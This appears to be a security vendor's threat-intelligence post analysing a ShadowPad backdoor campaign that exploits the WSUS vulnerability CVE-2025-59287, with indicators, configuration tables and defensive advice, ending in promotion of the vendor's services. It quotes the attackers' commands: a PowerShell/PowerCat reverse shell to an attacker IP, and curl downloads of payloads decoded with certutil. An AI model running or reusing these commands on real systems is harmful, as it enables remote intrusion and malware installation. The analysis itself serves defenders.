Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287)

Estimated reading time: 15 minutes

  • Vulnerability Exploitation: CVE-2025-59287, a remote code execution vulnerability in WSUS, is exploited to deploy ShadowPad malware.
  • Malware Deployment: Attackers use legitimate Windows utilities like certutil and curl to install ShadowPad components.
  • Stealthy Backdoor: ShadowPad operates via DLL sideloading, remaining stealthy and persistent.
  • Mitigation Strategies: Timely patching, EDR solutions, network segmentation, and threat intelligence are crucial for defense.
  • PurpleOps Solutions: Cyber Threat Intelligence Platform, breach detection, and other services can help mitigate risks.

Exploiting CVE-2025-59287 to Deploy ShadowPad

This post analyzes an attack leveraging CVE-2025-59287, a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), to distribute the ShadowPad malware. ShadowPad, a backdoor frequently used by Chinese APT groups, allows attackers to gain persistent access and control over compromised systems. This analysis details the attack chain, ShadowPad’s functionality, and mitigation strategies.

The attack begins by exploiting CVE-2025-59287, a critical vulnerability affecting Windows Servers with WSUS enabled. This vulnerability allows for remote code execution with system-level privileges. Publicly available proof-of-concept (PoC) exploit code has accelerated its adoption by threat actors. The attackers then use PowerCat, a PowerShell-based Netcat utility, to establish a command shell on the target system. Subsequently, they deploy ShadowPad using legitimate Windows utilities like certutil and curl.

This incident underscores the importance of timely patch management and highlights the risks associated with unpatched vulnerabilities, especially in critical infrastructure components like WSUS.

Initial Access via WSUS and Foothold Establishment

Microsoft released a security advisory for CVE-2025-59287 on October 14th. The vulnerability resides in WSUS, a component used to manage and distribute updates within a Windows Server environment. Following the public release of PoC code on October 22nd, evidence of exploitation was observed. Specifically, the execution of PowerCat against vulnerable Windows Server systems was recorded. This suggests the attackers successfully gained access to the command shell (CMD) of the targeted systems.

The PowerShell command used in the initial access phase was:

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString ('powercat -c 154.17.26[.]41 -p 8080 -e cmd

This command downloads and executes PowerCat, establishing a reverse shell connection to the attacker-controlled IP address 154.17.26[.]41 on port 8080, effectively granting remote access to the compromised server.

Malware Installation Process

After gaining initial access, the attackers leveraged CVE-2025-59287 again on November 6th to install ShadowPad. They employed curl.exe and certutil.exe, both legitimate Windows utilities, to download and decode the necessary ShadowPad components.

The commands used for installation are:

* `curl hxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curl hxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curl hxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt`
* `certutil -decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp`

These commands download three files (tmp.txt, dll.txt, and exe.txt) from the attacker’s server and save them to the target system. The `certutil -decode` command then decodes the tmp.txt file, saving the output as 0C137A80.tmp in the C:\programdata\ directory. This decoded file contains the core ShadowPad functionality.

ShadowPad: A Stealthy Backdoor

ShadowPad rarely operates as a standalone executable. It typically relies on DLL sideloading, a technique where a malicious DLL is loaded instead of a legitimate one by exploiting the way Windows searches for DLLs. In this instance, ShadowPad is executed through an EXE and DLL file pair with filenames consistent with previous ShadowPad attacks.

The specific files involved in this attack are:

| Sideloaded DLL Name | DLL MD5 | Legitimate EXE Name | EXE MD5 | TMP File Name | TMP File MD5 |
| :—————— | :——————————- | :—————— | :——————————- | :————– | :————————————– |
| ETDApix.dll | 27e00b5594530e8c5e004098eef2ec50 | ETDCtrlHelper.exe | 564e7d39a9b6da3cf0da3373351ac717 | 0C137A80.tmp | 85b935e80e84dd47e0fa5e1dfb2c16f4 |

When the legitimate executable (ETDCtrlHelper.exe) is executed, the malicious DLL (ETDApix.dll) acts as the ShadowPad loader, operating entirely in memory. The .tmp file (0C137A80.tmp), located in the same directory, contains the core ShadowPad functionality, including its backdoor configuration data.

Key configuration details observed in this attack are:

| Config Item | Value |
| :—————————– | :——————————————————————- |
| Mutex | Q-X64 |
| Service Name | Q-X64 |
| Service Display Name | Q-X64 Service |
| Service Description | Q-X64 Service for windows |
| Persistence Registry Key | SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| Persistence Registry Value | Q-X64 |
| Persistence Name | Q-X64 |
| Task Scheduler Path | Microsoft\Windows\UPnP |
| Task Scheduler Name | Microsoft Corporation |
| Task Scheduler Description | Q-X64 Service for windows |
| Startup Process Path #1 | %ProgramFiles%\Q-X64\Q-X64.exe |
| Startup Process Path #2 | %APPDATA%\Q-X64\Q-X64.exe |
| Startup Process Path #3 | %LOCALAPPDATA%\Q-X64\Q-X64.exe |
| Startup Process Path #4 | %TEMP%\Q-X64\Q-X64.exe |
| Sideloading DLL Name | ETDApix.dll |
| Injection Target Process Path #1 | “%PROGRAMFILES%\Windows Mail\WinMail.exe” Q-X64 |
| Injection Target Process Path #2 | “%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe” Q-X64 |
| Injection Target Process Path #3 | “%ProgramFiles%\Windows Media Player\wmplayer.exe” Q-X64 |
| Injection Target Process Path #4 | “%SystemRoot%\system32\svchost.exe” Q-X64 |
| C&C #1 | |
| C&C #2 | |
| Proxy IP #1 | N/A |
| Proxy IP #2 | N/A |
| Proxy IP #3 | N/A |
| Proxy IP #4 | N/A |
| C&C Header #1 | POST |
| C&C Header #2 | 65536 |
| C&C Header #3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 |
| C&C Header #4 | Accept-Language: en-ca,en;q=0.8,en-us;q=0.6,de-de;q=0.4,de;q=0.2 |
| C&C Header #5 | Accept-Encoding: gzip, deflate |
| C&C Header #6 | Accept: text/html, application/xhtml+xml, image/jxr, */* |
| C&C Header #7 | N/A |
| Forward TCP IP | Registry Required |
| Forward UDP IP | Registry Required |
| Files Registered for Persistence | N/A |

This configuration data reveals ShadowPad’s persistence mechanisms, target processes for injection, and communication protocols for command and control (C&C).

Practical Takeaways

Technical Readers:

* Patch Management: Prioritize patching systems, especially those exposed to the internet or handling sensitive data. Implement a system for promptly applying security updates, focusing on critical vulnerabilities like CVE-2025-59287.
* Endpoint Detection and Response (EDR): Deploy EDR solutions to detect and respond to suspicious activities, such as the execution of unusual processes or the use of legitimate tools (certutil, curl) for malicious purposes.
* Network Segmentation: Implement network segmentation to limit the lateral movement of attackers within the network. Isolate critical systems and services to minimize the impact of a potential breach.
* Monitoring and Alerting: Configure monitoring and alerting systems to detect unusual network traffic, suspicious process executions, and modifications to critical system files or registry keys. Focus on detecting PowerCat execution and unusual use of certutil and curl.
* Threat Intelligence: Utilize cyber threat intelligence platform feeds to stay informed about the latest threats, vulnerabilities, and attack techniques. Leverage this intelligence to proactively identify and mitigate risks.

Non-Technical Readers:

* Understand the Importance of Cybersecurity: Recognize that cybersecurity is not just an IT issue, but a business imperative. Ensure that your organization has a cybersecurity strategy in place and that it is regularly reviewed and updated.
* Support IT Security Initiatives: Provide the necessary resources and support to your IT security team to implement and maintain effective security measures.
* Employee Training: Invest in employee training to raise awareness about phishing, social engineering, and other common attack vectors. Educate employees on how to identify and report suspicious activities.
* Regular Security Assessments: Conduct regular security assessments and penetration testing to identify vulnerabilities and weaknesses in your organization’s security posture.
* Incident Response Plan: Develop and maintain an incident response plan to ensure that your organization can effectively respond to and recover from a security incident.

PurpleOps and Mitigation Strategies

PurpleOps provides a suite of cybersecurity services that can assist organizations in mitigating the risks associated with attacks like the ShadowPad campaign:

* Cyber Threat Intelligence Platform: PurpleOps offers a Cyber Threat Intelligence Platform that provides real-time ransomware intelligence, dark web monitoring service, telegram threat monitoring, live ransomware API, underground forum intelligence, and brand leak alerting. This platform helps organizations stay informed about emerging threats and proactively identify potential risks.
* Breach Detection: PurpleOps’ breach detection services can help organizations identify and respond to security incidents quickly and effectively.
* Supply-Chain Risk Monitoring: PurpleOps provides supply-chain risk monitoring to assess and mitigate the security risks associated with third-party vendors.
* Dark Web Monitoring: PurpleOps’ dark web monitoring service can detect compromised credentials and other sensitive information that may be circulating on the dark web.
* Penetration Testing: Proactive penetration testing helps identify exploitable weaknesses.
* Red Team Operations: Simulate advanced attacks to assess your defense capabilities.

Conclusion

The ShadowPad attack exploiting CVE-2025-59287 demonstrates the speed at which attackers weaponize newly disclosed vulnerabilities. The use of legitimate tools for malicious purposes and the reliance on DLL sideloading techniques highlight the need for layered security defenses, continuous monitoring, and proactive threat intelligence. Organizations must prioritize patching, implement robust endpoint detection and response capabilities, and leverage threat intelligence to stay ahead of evolving threats.

For more information on how PurpleOps can help your organization strengthen its cybersecurity posture, please visit our website at https://www.purple-ops.io/platform/ or contact us at PurpleOps Solutions.

FAQ

Q: What is CVE-2025-59287?

A: CVE-2025-59287 is a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS).

Q: What is ShadowPad?

A: ShadowPad is a backdoor malware frequently used by Chinese APT groups to gain persistent access and control over compromised systems.

Q: How can I protect my systems from this type of attack?

A: Implement timely patch management, deploy EDR solutions, segment your network, monitor for suspicious activity, and utilize threat intelligence.

Q: What services does PurpleOps offer to help mitigate these risks?

A: PurpleOps offers a Cyber Threat Intelligence Platform, breach detection, supply-chain risk monitoring, dark web monitoring, and penetration testing services.